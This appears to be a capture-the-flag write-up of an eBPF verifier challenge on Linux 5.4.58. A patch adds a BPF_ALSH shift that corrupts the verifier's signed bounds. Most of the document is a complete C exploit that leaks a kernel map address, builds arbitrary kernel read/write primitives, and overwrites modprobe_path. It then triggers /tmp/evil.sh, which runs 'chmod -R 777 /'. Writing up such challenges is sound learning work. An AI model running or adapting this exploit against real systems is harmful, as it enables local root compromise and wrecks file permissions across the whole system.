Problem

Environment

  • kernel version: 5.4.58
  • unprivileged_bpf_disabled: 0

Patch file

The important part is following:

      diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
< #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
< struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
< {
< 	if (insn_bitness == 32)
< 		//Never reach here now.
< 		return TNUM((u32)(((s32)a.value) << min_shift),
< 			    (u32)(((s32)a.mask)  << min_shift));
< 	else
< 		return TNUM((s64)a.value << min_shift,
< 			    (s64)a.mask  << min_shift);
< }
< 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
< 	case BPF_ALSH:
< 		if (umax_val >= insn_bitness) {
< 			/* Shifts greater than 31 or 63 are undefined.
< 			 * This includes shifts by a negative number.
< 			 */
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		}
< 
< 		/* Upon reaching here, src_known is true and
< 		 * umax_val is equal to umin_val.
< 		 */
< 		if (insn_bitness == 32) {
< 			//Now we don't support 32bit. Cuz im too lazy.
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		} else {
< 			dst_reg->smin_value <<= umin_val;
< 			dst_reg->smax_value <<= umin_val;
< 		}
< 
< 		dst_reg->var_off = tnum_alshift(dst_reg->var_off, umin_val,
< 						insn_bitness);
< 
< 		/* blow away the dst_reg umin_value/umax_value and rely on
< 		 * dst_reg var_off to refine the result.
< 		 */
< 		dst_reg->umin_value = 0;
< 		dst_reg->umax_value = U64_MAX;
< 		__update_reg_bounds(dst_reg);
< 		break;

And related location is following:

Vulnerability

As we can see, when we use BPF_ALSH, dst_reg->smin_value <<= umin_val; dst_reg->smax_value <<= umin_val; is executed. And because type of smin_value and smax_value is s64, we can make smin_value > smax_value.

Exploit

Making invalid range

My step for making invalid range is following:

  1. Load element from bpf_map (we call it e)
    1. Its actual value is 1.
    2. Its tnum may be (.val=0, .mask=0xffffffffffffffff).
  2. Do e & 0x1fffffffffffffff.
    1. Its actual value is 1.
    2. Its tnum may be (.val=0, .mask=0x1fffffffffffffff).
  3. Do left shift to e by 3.
    1. Its actual value is 8.
    2. Its tnum may be (.val=0, .mask=0xfffffffffffffff8).
    3. Its min and max value is 0 and 0xfffffffffffffff8.
  4. Add 8 to e.
    1. It actual value is 0x10.
    2. Its min and max value is 8 and 0.
      1. Explained later.
  5. Add (.val=0, .mask=8; min=0, max=8) to e.
    1. Now e has (actual_value, verification_value) = (0x10, 8).
  6. Substract 8 from e.
    1. Now e has (act_val, veri_val) = (8, 0).

Why e+=8 does make min=8, max=0 ??

First, we check related functions (codes):

      // @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4600
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state *dst_reg,
                                      struct bpf_reg_state src_reg) {
    // ...

  case BPF_ADD:
    ret = sanitize_val_alu(env, insn);
    if (ret < 0) {
      verbose(env, "R%d tried to add from different pointers or scalars\n",
              dst);
      return ret;
    }
    if (signed_add_overflows(dst_reg->smin_value, smin_val) ||
        signed_add_overflows(dst_reg->smax_value, smax_val)) {
      // ...
    } else {
      dst_reg->smin_value += smin_val;
      dst_reg->smax_value += smax_val;
    }
    if (dst_reg->umin_value + umin_val < umin_val ||
        dst_reg->umax_value + umax_val < umax_val) {
      dst_reg->umin_value = 0;
      dst_reg->umax_value = U64_MAX;
    } else {
      // ...
    }
    dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
    break;

    // ...

    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L62
struct tnum tnum_add(struct tnum a, struct tnum b) {
  u64 sm, sv, sigma, chi, mu;

  sm = a.mask + b.mask;
  sv = a.value + b.value;
  sigma = sm + sv;
  chi = sigma ^ sv;
  mu = chi | a.mask | b.mask;
  return TNUM(sv & ~mu, mu);
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L939
/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg_deduce_bounds(struct bpf_reg_state *reg) {
  /* Learn sign from signed bounds.
   * If we cannot cross the sign boundary, then signed and unsigned bounds
   * are the same, so combine.  This works even in the negative case, e.g.
   * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
   */
  if (reg->smin_value >= 0 || reg->smax_value < 0) {
    reg->smin_value = reg->umin_value =
        max_t(u64, reg->smin_value, reg->umin_value);
    reg->smax_value = reg->umax_value =
        min_t(u64, reg->smax_value, reg->umax_value);
    return;
  }

  // ...
}

When add 8 to e, e is (smin=umin=0, smax=umax=0xfffffffffffffff8; .val=0, .mask=0xfffffffffffffff8). So and since signed_add_overflows(dst_reg->smin_value, smin_val) || signed_add_overflows(dst_reg->smax_value, smax_val) is false and dst_reg->umin_value + umin_val < umin_val || dst_reg->umax_value + umax_val < umax_val is true, dst_reg->smin_value += smin_val; dst_reg->smax_value += smax_val; and dst_reg->umin_value = 0; dst_reg->umax_value = U64_MAX; is executed. Then, e is (smin=8, smax=0, umin=0, umax=U64_MAX).

And return value of tnum_add is (.val=0, .mask=0xfffffffffffffff8). So after dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);, e is (smin=8, smax=0, umin=0, umax=U64_MAX; .val=0, .mask=0xfffffffffffffff8).

But in __reg_deduce_bounds, reg->smin_value >= 0 || reg->smax_value < 0 is true, reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value, reg->umin_value); and reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value, reg->umax_value); is performed. Because reg->smin_value == 8, reg->umin_value == 0, reg->smax_value == 0 and reg->umax_value == U64_MAX, register’s min and max value is set by reg->?min_value = max_t(u64, 8, 0) and reg->?max_value = min_t(u64, 0, U64_MAX).

Because of this reasons, after e+=8, e will be (min=8, max=0).

Leak struct bpf_map address

In adjust_ptr_min_max_vals function, if off_reg->smin_value > off_reg->smax_value, the pointer is marked as unknown. And the type of unknown register is scalar, we can leak its value.

See followings:

AAR/AAW primitives

We can use the technique using bpf_skb_load_bytes because of scalar which has invalid range. Using this techinuqe, we can set the value on stack without verification by using invalid len argument. Originally bpf_skb_load_bytes changes values from to to to+len. So, the values are marked as unknown. But with invalid len, we can set values with marked as known (invalid verification).

So, we can use this.

Exploit code

      #include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define BPF_ALSH 0xe0

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81a0dec0 - KERNEL_BASE)
#define MODPROBE_OFFSET (0xffffffff81c2e800 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd;
uint64_t map_addr;
static uint64_t leak_bpf_map_addr(int do_print_verifier_log) {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // map_lookup_elem(mapfd, &key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == 0 == (.val=0, .mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_0,
                    1),  // r0 = r0 & 1 == 0 == (.val=0, .mask=1)
      BPF_ALU64_IMM(
          BPF_ALSH, BPF_REG_0,
          63),  // r0 = r0 << 63 == 0 == (.val=0, .mask=0x8000000000000000);
      // smin=0, smax=0x8000000000000000

      BPF_MOV64_REG(BPF_REG_1, BPF_REG_5),  // r1 = r5 == map_elem
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_0),  // r1 = r1 + r0; Because r0's smin > s0's smax,
                                 // r1 will be marked as unknown.
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_1),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // arg3(&val)
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10),
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, BPF_ANY),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s", verifier_log);
    puts("============[failed reason]============");
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Trigger the BPF program
  write(socks[1], "UNIGURI", 7);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  if (do_print_verifier_log) {
    puts("============[verifier log]============");
    printf("%s", verifier_log);
    puts("============[verifier log]============");
  }

  return val - 0xd0;
}

static void aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 >> 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 & r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 << 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      BPF_ALU64_IMM(
          BPF_REG_0, BPF_ADD,
          8),  // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8,
               // umax=0). Because of integer overflow in umax.
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
          0x08),  // r1 = r1 & 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it's actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it's actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it's actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s", verifier_log);
    puts("============[failed reason]============");
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}
static uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 >> 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 & r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 << 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      BPF_ALU64_IMM(
          BPF_REG_0, BPF_ADD,
          8),  // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8,
               // umax=0).
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
          0x08),  // r1 = r1 & 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it's actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it's actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it's actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s", verifier_log);
    puts("============[failed reason]============");
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));

  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

int main() {
  mapfd = bpf_map_create(sizeof(uint64_t), 1);
  map_addr = leak_bpf_map_addr(0);
  printf("[+] map_addr = 0x%016lx\n", map_addr);

  uint64_t kernel_base = aar64(map_addr) - BPF_MAP_OPS_OFFSET;
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  const char* new_modprobe = "/tmp/evil.sh";
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf("[*] Overwrite modprobe to %s\n", new_modprobe);
  for (size_t i = 0; i < new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROBE_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd < 0) {
      fatal("open(/proc/sys/kernel/modprobe)");
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf("[*] new modprobe: %s\n", modprobe);
      puts("[-] Failed to overwrite modprobe");
      return -1;
    }
    puts("[+] Successfully overwritten modprobe");
  }

  puts("[+] Get root");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn");

  close(mapfd);
  return 0;
}

Reference